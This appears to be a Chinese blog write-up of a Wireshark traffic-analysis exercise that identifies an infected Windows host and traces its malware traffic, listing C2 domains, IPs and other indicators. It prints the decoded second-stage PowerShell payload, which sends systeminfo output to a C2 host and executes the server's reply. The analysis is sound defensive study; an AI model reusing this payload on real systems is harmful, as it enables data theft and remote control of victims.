📌 目录

    Wireshark流量分析——2025-06-13 It's a trap!

    文件地址:2025-06-13-traffic-analysis-exercise.pcap.zip
    解压密码:infected_20250613

    背景信息

    • 局域网段范围:10.6.13[.]0/24(从 10.6.13[.]0 到 10.6.13[.]255)

    • 域名:massfriction[.]com

    • 活动目录(AD)域控制器:10.6.13[.]3 - WIN-DQL4WFWJXQ4

    • AD 环境名称:MASSFRICTION

    • 局域网段网关:10.6.13[.]1

    • 局域网段广播地址:10.6.13[.]255

    目标

    1.受感染 Windows 客户端的 IP 地址是什么?

    2.被感染 Windows 客户端的 MAC 地址是什么?

    3.被感染 Windows 客户端的主机名是什么?

    4.被感染的 Windows 客户端上的用户账户名是什么?

    分析

    1.image-20260804135523229

    看会话,字节倒序找受感染IP,感染内网IP为10.6.13.133

    2.image-20260804135650346

    过滤感染主机直接看MAC,此处为24:77:03:ac:97:df

    3.image-20260804135803134

    过滤nbns,获取主机名为DESKTOP-5AVE44C

    或者过滤kerberos找主机名

    image-20260804140051399

    4.image-20260804140205119

    同样过滤

    kerberos and kerberos.CNameString and !(kerberos.CNameString contains "$")
    

    看CNameString即为用户名,rgaines

    答案

    1.受感染 Windows 客户端的 IP 地址是什么?10.6.13.133

    2.被感染 Windows 客户端的 MAC 地址是什么?24:77:03:ac:97:df

    3.被感染 Windows 客户端的主机名是什么?DESKTOP-5AVE44C

    4.被感染的 Windows 客户端上的用户账户名是什么?rgaines

    拓展

    image-20260804155942269

    image-20260804172037824

    过滤了感染主机的http请求,发现了104.21.24.186、104.16.231.132、104.21.112.1、104.21.16.1、217.20.51.22、23.192.223.206、23.192.223.240,分别过滤每个IP查下DNS查询

    image-20260804172148203

    image-20260804160156794

    image-20260804165816835

    event-time-microsoft.org:104.21.24.186
    varying-rentals-calgary-predict.trycloudflare.com:104.16.231.132
    eventdata-microsoft.live:104.21.112.1
    event-datamicrosoft.live:104.21.16.1
    ctldl.windowsupdate.com:非恶意域名,忽略,217.20.51.22
    www.msftconnecttest.com:非恶意域名,忽略,23.192.223.206
    acroipm2.adobe.com:非恶意域名,忽略,23.192.223.240

    所以接下来关注104.21.24.186、104.21.112.1、104.21.16.1、104.16.231.132

    (1)104.21.24.186

    image-20260804172325919

    image-20260804173622574

    追踪http流分析响应体,发现请求了一个高度混淆的 PowerShell 恶意程序,其核心行为为:拼接 Base64 片段 → 解码 → 执行第二阶段载荷,最终实现信息收集和远程命令执行。

    第二阶段载荷:

    image-20260804174823407

    # 1. 定义 C2 服务器 URL(缺少协议头,实际请求时可能使用 HTTP/HTTPS)
    $c2Url = "eventdata-microsoft.live/NV4RgNEu"
    
    # 2. 收集系统信息(执行 systeminfo 并转为字符串)
    $sysInfo = systeminfo | Out-String
    
    # 3. 设置 HTTP 请求的 Content-Type 为二进制流(伪装流量)
    $contentType = "application/octet-stream"
    
    # 4. 动态构造 "Invoke-RestMethod" 命令(通过数字转字符)
    $invokeRestMethod = [string]::join('', (73,110,118,111,107,101,45,82,101,115,116,77,101,116,104,111,100 | ForEach-Object { [char]$_ }))
    # 上述数字数组对应 ASCII:I n v o k e - R e s t M e t h o d
    
    # 5. 发送 POST 请求,将系统信息作为 Body 发送,并接收服务器响应
    $response = & $invokeRestMethod -Uri $c2Url -Method POST -Body $sysInfo -ContentType $contentType
    
    # 6. 动态构造 "Invoke-Expression" 命令(同样通过数字转字符)
    $invokeExpression = [string]::join('', (73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110 | ForEach-Object { [char]$_ }))
    # 对应:I n v o k e - E x p r e s s i o n
    
    # 7. 执行服务器返回的内容($response 应为 PowerShell 代码)
    & $invokeExpression $response
    

    这段代码执行 systeminfo命令获取配置,然后通过 Invoke-RestMethodeventdata-microsoft.live/NV4RgNEu 发送 POST 请求,传递泄露的系统信息。

    (2)104.21.112.1

    image-20260805105744075

    image-20260805110256640

    这是受害ipPOST上传系统信息

    image-20260805110327073

    响应代码很长,但和前面一样,攻击者依旧采用拼接Base64片段并解码的方式绕过过滤和检测,,获取临时目录,创建目标目录,然后从正规的php网站下载php环境下载zip包,解压到目标目录,构造POST请求到C2地址eventdata-microsoft.live/NV4RgNEu,并执行服务器返回的命令

    (3)104.21.16.1&104.16.231.132

    image-20260805114512250

    每30s一个包,三个域名轮换,windows-msgas.comevent-datamicrosoft.live ↔ trycloudflare 隧道(varying-rentals-calgary-predict.trycloudflare.com),后续都是一样,除了有个/assets/Owner/arm/ProcessMAU.txt路径,响应304,无关紧要

    IOC:

    C2域名:event-time-microsoft.org / eventdata-microsoft.live / event-datamicrosoft.live / windows-msgas.com / dng-microsoftds.com / 两个 *.trycloudflare.com 隧道域名
    C2IP:104.21.24.186, 104.21.112.1, 104.21.16.1, 104.16.230.132, 104.16.231.132, 172.67.146.241
    UA特征:Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.4202
    通信特征:30s 固定信标间隔;URI 含 '&'+32位hex token;Content-Type:application/octet-stream
    落地文件:'%APPDATA%\php\php.exe'、'%APPDATA%\php\config.cfg'、'%TEMP%\php.zip'
    

    攻击链:

    flowchart TD A["外网恶意分发<br/>event-time-microsoft.org<br/>(Cloudflare 代理)"] --> B["PowerShell 下载器<br/>(伪装 MS 域名)"] B --> C1["POST systeminfo<br/>收集主机信息"] C1 --> C2["发送至 C2 信标<br/>eventdata-microsoft.live/NV4RgNEu"] B --> D["从合法站点下载<br/>windows.php.net<br/>PHP 8.2.28 (~33MB)"] D --> E["本地落地 PHP 后门"] E --> E1["%APPDATA%\\php\\config.cfg"] E --> E2["%APPDATA%\\php\\php.exe"] E2 --> F["PHP 后门执行"] F --> G["每 30s 向 C2 信标"] G --> H["3 域名轮换抗封禁"] H --> H1["windows-msgas.com"] H --> H2["event-datamicrosoft.live"] H --> H3["trycloudflare 隧道"]
    posted @ 2026-08-05 19:44  羽弥YUMI  阅读(13)  评论(0)    收藏  举报